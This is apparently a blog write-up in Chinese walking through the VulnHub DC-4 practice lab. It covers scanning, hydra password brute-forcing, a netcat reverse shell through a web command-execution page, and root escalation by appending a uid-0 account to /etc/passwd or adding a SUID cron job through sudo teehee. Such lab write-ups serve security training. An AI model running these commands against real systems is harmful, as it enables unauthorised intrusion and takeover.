VulnHub-DC: 4

靶机地址:https://www.vulnhub.com/entry/dc-4,313/

目标:There is only one flag, but technically, multiple entry points and just like last time, no clues.

一、实验环境

  • 攻击机:Kali Linux(192.168.0.2)

  • 靶机:DC: 4(192.168.0.3)

二、信息收集

1、主机发现

1.2 Nmap

nmap -sn 192.168.0.0/24

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.0.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 08:10 CST
Nmap scan report for 192.168.0.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.0.3
Host is up (0.00051s latency).
MAC Address: 00:0C:29:AD:4A:FA (VMware)
Nmap scan report for 192.168.0.128
Host is up (0.00038s latency).
MAC Address: 00:50:56:E2:72:6C (VMware)
Nmap scan report for 192.168.0.2
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.28 seconds

1.3 Netdiscover

netdiscover -i eth0 -r 192.168.0.0/24

┌──(root㉿kali)-[~]
└─# netdiscover -i eth0 -r 192.168.0.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
_____________________________________________________________________________
  IP           At MAC Address     Count     Len MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.0.1     00:50:56:f3:b5:59     1     60 VMware, Inc.
192.168.0.1     00:50:56:c0:00:08     1     60 VMware, Inc.
192.168.0.3     00:0c:29:ad:4a:fa     1     60 VMware, Inc.
192.168.0.128   00:50:56:e2:72:6c     1     60 VMware, Inc.

1.4 Arp-scan

arp-scan -l

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.0.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     00:50:56:c0:00:08       VMware, Inc.
192.168.0.1     00:50:56:f3:b5:59       VMware, Inc. (DUP: 2)
192.168.0.3     00:0c:29:ad:4a:fa       VMware, Inc.
192.168.0.128   00:50:56:e2:72:6c       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 3 responded

2、端口扫描

masscan --rate=10000 --ports 0-65535 192.168.0.3

┌──(root㉿kali)-[~]
└─# masscan --rate=10000 --ports 0-65535 192.168.0.3
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-05-07 00:16:45 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 192.168.0.3                                    
Discovered open port 22/tcp on 192.168.0.3

3、版本探测和操作系统识别

nmap -sV -T4 -O -p 80,22 192.168.0.3

┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -O -p 80,22 192.168.0.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 08:19 CST
Nmap scan report for 192.168.0.3
Host is up (0.0020s latency).

PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http   nginx 1.15.10
MAC Address: 00:0C:29:AD:4A:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

4、Web指纹识别

whatweb -v 192.168.0.3

┌──(root㉿kali)-[~]
└─# whatweb -v 192.168.0.3
WhatWeb report for http://192.168.0.3
Status   : 200 OK
Title     : System Tools
IP       : 192.168.0.3
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]

Detected Plugins:
[ HTML5 ]
      HTML version 5, detected by the doctype declaration


[ HTTPServer ]
      HTTP server header string. This plugin also attempts to
      identify the operating system from the server header.

      String       : nginx/1.15.10 (from server string)

[ PasswordField ]
      find password fields

      String       : password (from field name)

[ nginx ]
      Nginx (Engine-X) is a free, open-source, high-performance
      HTTP server and reverse proxy, as well as an IMAP/POP3
      proxy server.

      Version     : 1.15.10
      Website     : http://nginx.net/

HTTP Headers:
      HTTP/1.1 200 OK
      Server: nginx/1.15.10
      Date: Sun, 07 May 2023 00:20:16 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close

5、网站目录扫描

dirb http://192.168.0.3 /usr/share/dirb/wordlists/big.txt

┌──(root㉿kali)-[~]
└─# dirb http://192.168.0.3 /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 7 08:21:16 2023
URL_BASE: http://192.168.0.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                        

---- Scanning URL: http://192.168.0.3/ ----
==> DIRECTORY: http://192.168.0.3/css/
==> DIRECTORY: http://192.168.0.3/images/

---- Entering directory: http://192.168.0.3/css/ ----

---- Entering directory: http://192.168.0.3/images/ ----

-----------------
END_TIME: Sun May 7 08:21:56 2023
DOWNLOADED: 61374 - FOUND: 0

6、信息收集汇总

  • IP => 192.168.0.3

  • 开放端口

    • 80 => http服务 --- nginx 1.15.10

    • 22 => ssh服务 --- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

  • OS => Linux 3.2 - 4.9(Debian)

  • linux kernel => 3/4

  • nginx => 1.15.10

  • 扫描出来的网站目录

三、渗透测试

1、漏洞发现和利用

首先尝试 22端口,它确实提供的是ssh服务,尝试了几个弱口令,没有成功。

ssh root@192.168.0.3

┌──(root㉿kali)-[~]
└─# ssh root@192.168.0.3
The authenticity of host '192.168.0.3 (192.168.0.3)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.3' (ED25519) to the list of known hosts.
root@192.168.0.3's password:
Permission denied, please try again.
root@192.168.0.3's password:
Permission denied, please try again.
root@192.168.0.3's password:
root@192.168.0.3: Permission denied (publickey,password).

接下来尝试用hydra进行爆破

hydra -l root -P pass.txt -vV -t 10 -o ssh.txt 192.168.0.3 ssh -s 22

  • -l LOGIN or -L FILE:使用LOGIN名称登录,或从FILE加载多个登录

  • -p PASS or -P FILE:尝试密码PASS,或从FILE加载多个密码

  • -v / -V / -d:详细模式/显示登录+每次尝试通过/调试模式

  • -t TASKS:每个目标并行运行TASKS连接数(默认值:16)

  • -o FILE:将找到的登录名/密码对写入文件而不是标准输出

  • -s PORT:如果服务在不同的默认端口上,请在此处定义

┌──(root㉿kali)-[~]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 10 -o ssh.txt 192.168.0.3 ssh -s 22
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-07 08:36:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.0.3:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.0.3:22
[INFO] Successful, password authentication is supported by ssh://192.168.0.3:22
[ATTEMPT] target 192.168.0.3 - login "root" - pass "123456" - 1 of 14344399 [child 0] (0/0)



┌──(root㉿kali)-[~]
└─# cat ssh.txt
# Hydra v9.4 run at 2023-05-07 08:38:43 on 192.168.0.3 ssh (hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 10 -o ssh.txt -s 22 192.168.0.3 ssh)

爆破失败,还可以使用msf进行爆破。

msfconsole

┌──(root㉿kali)-[~]
└─# msfconsole


______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *

^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com


=[ metasploit v6.2.36-dev ]
+ -- --=[ 2277 exploits - 1191 auxiliary - 408 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 >

首先查找模块

search ssh_login

msf6 > search ssh_login

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

使用模块

use auxiliary/scanner/ssh/ssh_login

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >

查看需要设置的参数

show options

msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts


View the full module info with the info, or info -d command.

设置参数开始攻击

set rhosts 192.168.0.3

set verbose true

set pass_file /usr/share/wordlists/rockyou.txt

set user_file /usr/share/wordlists/rockyou.txt

run

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.3
rhosts => 192.168.0.3
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/rockyou.txt
pass_file => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /usr/share/wordlists/rockyou.txt
user_file => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.0.3:22 - Starting bruteforce

这里也是爆破失败,接下来开始在 Web端搜刮资源

它的首页是一个登录界面,使用BP爆破成功

得到口令

  • 用户名:admin

  • 密码:happy

这里还可以用hydra进行爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o DC4.pass -vV -t 5 -f 192.168.0.3 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

  • -o [文件名]:爆破成功的话里面会放得到的密码

  • -f:得到了一组用户名和密码就停止爆破

  • http-post-form:POST表单提交的数据

  • /login.php:请求的目录

  • username=^USER^&password=^PASS^:攻击载荷

  • S=logout:密码正确时返回的应用关键字符串

    • S=logout是因为一般登录成功之后返回的关键字符串中都有logout

┌──(root㉿kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt -o DC4.pass -vV -t 5 -f 192.168.0.3 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-07 09:07:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 5 tasks per 1 server, overall 5 tasks, 14344399 login tries (l:1/p:14344399), ~2868880 tries per task
[DATA] attacking http-post-form://192.168.0.3:80/login.php:username=^USER^&password=^PASS^:S=logout
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done

爆破得用户名和密码

[80][http-post-form] host: 192.168.0.3   login: admin   password: happy
[STATUS] attack finished for 192.168.0.3 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-07 09:08:19

登录成功,找的了一个命令执行的地方

不过只能执行规定命令

但是在前端修改代码就可以执行其它的命令

执行成功

在Kali上监听5868端口

nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...

在这里执行反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.2 5868 > /tmp/f

GetShell成功

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 55416
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

2、提权

升级FULL TTY

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 33 columns 145

reset

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ ^Z
[1]+ 已停止 nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
ls
command.php css images index.php login.php logout.php
www-data@dc-4:/usr/share/nginx/html$ export SHELL=/bin/bash
www-data@dc-4:/usr/share/nginx/html$ export TERM=screen
www-data@dc-4:/usr/share/nginx/html$ stty rows 33 columns 145
www-data@dc-4:/usr/share/nginx/html$ reset
www-data@dc-4:/usr/share/nginx/html$

收集服务器信息

whoami

pwd

uname -a

lsb_release -a

cat /etc/issue

www-data@dc-4:/usr/share/nginx/html$ whoami
www-data
www-data@dc-4:/usr/share/nginx/html$ pwd
/usr/share/nginx/html
www-data@dc-4:/usr/share/nginx/html$ uname -a
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686 GNU/Linux
www-data@dc-4:/usr/share/nginx/html$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.8 (stretch)
Release: 9.8
Codename: stretch
www-data@dc-4:/usr/share/nginx/html$ cat /etc/issue
Debian GNU/Linux 9 \n \l

www-data@dc-4:/usr/share/nginx/html$

切换到 home目录下,在 jim用户的家目录下找到old-passwords.bak文件

www-data@dc-4:/usr/share/nginx/html$ cd /home/
www-data@dc-4:/home$ ls -al
total 20
drwxr-xr-x 5 root root 4096 Apr 7 2019 .
drwxr-xr-x 21 root root 4096 Apr 5 2019 ..
drwxr-xr-x 2 charles charles 4096 Apr 7 2019 charles
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 jim
drwxr-xr-x 2 sam sam 4096 Apr 7 2019 sam
www-data@dc-4:/home$ cd jim/
www-data@dc-4:/home/jim$ ls -al
total 32
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
www-data@dc-4:/home/jim$ cd backups/
www-data@dc-4:/home/jim/backups$ ls -al
total 12
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2047 Apr 7 2019 old-passwords.bak

old-passwords.bak文件里面放的是一些密码

www-data@dc-4:/home/jim/backups$ head old-passwords.bak 
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon

把这些密码复制到Kali中(PS:如果密码文件太长无法复制可以用SCP把该文件下载到Kali中去),再创建一个用户名文件,里面写jim,sam和charles,然后用hydra爆破SSH

┌──(root㉿kali)-[~]
└─# head user
jim
sam
charles

┌──(root㉿kali)-[~]
└─# head pass
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon

开始爆破

hydra -L user -P pass 192.168.0.3 ssh -s 22

┌──(root㉿kali)-[~]
└─# hydra -L user -P pass 192.168.0.3 ssh -s 22
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-07 09:39:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.0.3:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 613 to do in 00:05h, 13 active
[22][ssh] host: 192.168.0.3 login: jim password: jibril04
[STATUS] 123.67 tries/min, 371 tries in 00:03h, 388 to do in 00:04h, 13 active
[STATUS] 106.71 tries/min, 747 tries in 00:07h, 12 to do in 00:01h, 13 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-07 09:47:27

得到登录口令

  • 用户名:jim

  • 密码:jibril04

用jim登录ssh成功

ssh jim@192.168.0.3

┌──(root㉿kali)-[~]
└─# ssh jim@192.168.0.3
jim@192.168.0.3's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

/var/mail邮件目录下找到了 charles用户交给 jim用户保管的密码

用户名:charles

密码:^xHhA&hvim0y

jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls -al
total 16
drwxrwsr-x 2 root mail 4096 May 6 17:30 .
drwxr-xr-x 12 root root 4096 Apr 5 2019 ..
-rw-rw---- 1 jim mail 715 Apr 6 2019 jim
-rw-rw---- 1 www-data mail 1773 May 6 17:30 www-data
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

使用SSH用该密码登录 charles用户成功

ssh charles@192.168.0.3

┌──(root㉿kali)-[~]
└─# ssh charles@192.168.0.3
charles@192.168.0.3's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
charles@dc-4:~$

使用sudo -l命令查看用户可以执行的sudo命令

sudo -l

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee

允许charles用户以root身份执行teehee命令,且不需要输入密码。查看该命令的使用说明

teehee --help

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

翻译一下该命令说明文档

用法: teehee [选项]... [文件]...
将标准输入复制到每个FILE,也复制到标准输出。

-a, --append 附加到给定的FILEs,不要覆盖
-i, --ignore-interrupts 忽略中断信号
-p 诊断写入非管道的错误
--output-error[=MODE] 设置写入错误时的行为。请参阅下面的MODE(模式)
--help 显示此帮助并退出
--version 输出版本信息并退出

MODE 确定输出中存在写入错误的行为:
'warn' 诊断写入任何输出的错误
'warn-nopipe' 诊断写入任何非管道输出的错误
'exit' 写入任何输出时出错退出
'exit-nopipe' 写入任何非管道输出时出错退出
-p选项的默认模式为“warn-nopipe”.
当未指定--output错误时,默认操作是在错误写入管道时立即退出,并诊断写入非管道输出的错误。

GNU核心在线帮助: <http://www.gnu.org/software/coreutils/>
完整文档网址:: <http://www.gnu.org/software/coreutils/tee>
或通过本地提供: info '(coreutils) tee invocation'

2.1 方法一

使用该命令给/etc/passwd里面添加一个用户

首先获取要添加的用户的密码

perl -le 'print crypt("root","sa")'

charles@dc-4:~$ perl -le 'print crypt("root","sa")'
saFKJij3eLACw

然后添加用户到/etc/passwd文件中

echo "hack:saFKJij3eLACw:0:0:::/bin/bash" |sudo teehee -a /etc/passwd

charles@dc-4:~$ echo "hack:saFKJij3eLACw:0:0:::/bin/bash" |sudo teehee -a /etc/passwd
hack:saFKJij3eLACw:0:0:::/bin/bash
charles@dc-4:~$ tail -1 /etc/passwd
hack:saFKJij3eLACw:0:0:::/bin/bash

切换到hack用户

su hack

charles@dc-4:~$ su hack
Password:
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)

提权成功,在/root/目录下得到最终flag

root@dc-4:/home/charles# cd /root/
root@dc-4:/root# ls -al
total 28
drwx------ 3 root root 4096 Apr 7 2019 .
drwxr-xr-x 21 root root 4096 Apr 5 2019 ..
-rw------- 1 root root 16 Apr 7 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 976 Apr 6 2019 flag.txt
drwxr-xr-x 2 root root 4096 Apr 6 2019 .nano
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
root@dc-4:/root# cat flag.txt



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:/root#

2.2 方法二

创建定时任务,赋予shell文件SUID权限

查看系统支持shell类型

cat /etc/shells

charles@dc-4:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

查看/bin/sh环境

ls -l /bin/sh

ls -l /bin/dash

charles@dc-4:~$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
charles@dc-4:~$ ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash

赋予/bin/sh文件SUID权限,用teehee命令把这个定时任务写到定时任务文件/etc/crontab

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh

相关参数说明,设置为 * * * * *表示后面的命令每一分钟都执行。

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

查看定时任务文件/etc/crontab发现定时任务已被写入

cat /etc/crontab

charles@dc-4:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root chmod 4777 /bin/sh

查看/bin/dash环境已有S权限

ls -l /bin/dash

charles@dc-4:~$ ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash

切换到/bin/sh提权成功

/bin/sh

charles@dc-4:~$ /bin/sh
# whoami
root
#

/root/目录下查看flag

cd /root/

cat flag.txt

# cd /root/     
# ls -al
total 28
drwx------ 3 root root 4096 Apr 7 2019 .
drwxr-xr-x 21 root root 4096 May 7 12:40 ..
-rw------- 1 root root 16 Apr 7 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 976 Apr 6 2019 flag.txt
drwxr-xr-x 2 root root 4096 Apr 6 2019 .nano
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
# cat flag.txt



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

四、总结

1、渗透步骤

  1. SSH爆破失败,开始尝试Web服务

  2. Web服务是一个登录界面,爆破出口令

    • 用户名:admin

    • 密码:happy

  3. 登录后台之后发现可以执行系统命令,在前端修改html代码反弹shell后成功GetShell

  4. 进入服务器后是www-data用户,找不到提权的方法。但是在/home/jim目录下找到了一个密码文件

  5. 使用密码文件爆破得到jim用户的SSH密码。登录到jim用户之后还是无法提权,但在/var/mail目录中找到charles用户的SSH密码

  6. charles用户下执行sudo -l 命令,得到teehee命令具有S权限,使用该命令提权成功

2、知识点

  1. 信息收集时注意用户的邮件目录

  2. /etc/crontab目录中存放着系统的定时任务

posted @ 2023-05-08 16:09  HKalpa  阅读(84)  评论(0编辑  收藏  举报